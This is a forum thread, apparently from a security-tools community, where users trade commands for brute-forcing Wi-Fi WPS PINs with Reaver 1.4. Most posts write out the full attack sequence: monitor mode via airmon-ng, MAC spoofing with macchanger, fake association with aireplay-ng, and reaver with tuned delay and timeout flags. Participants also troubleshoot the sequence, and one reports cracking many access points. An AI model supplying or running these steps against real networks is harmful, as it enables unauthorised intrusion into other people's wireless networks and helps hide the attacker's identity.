Reaver 1.4 WPS Bruteforce Tool Install/Scan/Bruteforce Tutorial

[Eatme]

*This worked for me

:~# airmon-ng stop wlan0/mon0
ifconfig wlan0 down
macchanger -a wlan0 > copy mac
airmon-ng start wlan0 11 < AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

open new > TAB/Window/Terminal
aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run

:~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

-d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
-play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors

*This worked for me

[dombera]

Hi Eatme! Thans for the info!
I was wondering if you could post your conkyrc file as I like your config a lot?

[Eatme]

Hi Eatme! Thans for the info!
I was wondering if you could post your conkyrc file as I like your config a lot?

hey, np!

and thanks , but I can't seem to find my conkyrc file... I'm guessing I don't have it installed.

[Eatme]

im guessing the lower the (xx seconds/pin) are the faster its cracking or is it the higher they are..

I'm trying to test out some diff commands to make it crack the fastest without errors.. or trying the same pin

The highest I have it at is (10-20 seconds/pin)

[longjidin]

i am using this method its take time between 2 or 10 hour depend on the PIN correct me if i am wrong....

[viper606]

*This worked for me

:~# airmon-ng stop wlan0/mon0
ifconfig wlan0 down
macchanger -a wlan0 > copy mac
airmon-ng start wlan0 11 < AP channel
ifconfig mon0 down
macchanger -m "paste same mac" mon0
ifconfig wlan0 up
ifconfig mon0 up

open new > TAB/Window/Terminal
aireplay-ng mon0 -1 120 -a BSSID -e ESSID > let it run

:~# reaver -i mon0 -A -b BSSID -v -d 1 -x 30 -l 600

-d 1 can be -d 0 (0 might be too fast, in case it is add -l 60 or 120)
-play around with -x 30 as well, i manage to get 5-20+ keys /seconds without any errors

*This worked for me

What is meant by copy mac, mac wireless card or mac AP

[viper606]

macchanger -a wlan0 > copy mac

what is meant by copy mac, is it mac wireless card or mac app

[hannah]

I was having good results with v1.3, however was having difficulty with v1.4;
it was not associating with my test router whereas v1.3 was associating fine.

My work around was associating with aireplay-ng and running reaver with the -A switch ;

So in 1 terminal window ;

Code:

aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

In another terminal window ;

Code:

reaver -i mon0 -A -c XX -b 00:11:22:33:44:55 -v

Am still running through it, however sofar so good.

Apologies for quoting this old comment.
What is the reason for running

Code:

aireplay-ng mon0 -1 120 -b 00:11:22:33:55 -e ESSID

simultaneously with reaver in another terminal please.

I have been able to crack many WPS enabled APs just with this command:

Code:

reaver -i mon0 -b BSSID -c 7 -x 60 -a -f -vv

Question1: What is the need to for the aireplay-ng command in another terminal?
Question2: Can you run reaver 1.4 and reaver 1.3 in the same BT installation please?

Kind regards always

[TAPE]

1) The reason for me running the aireplay command was due to reaver not functioning as it should
on the installation I had at that time. Not sure what the error was that necessitated that, but it
was a work around that worked at the time.
With a later install on the later released BT5R2 it was no longer required for me.
It was a fix that was required only when reaver was not correctly associating on my setup, if it works
'out of the box' for you then no need to even consider it.

2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..

[hannah]

2) Actually, I dont think you can with the normal install procedures as one will overwrite the other..

Got that.. I am having a lot of issues lately with reaver 1.4..

In your opinion do you think reaver 1.3 is better, plz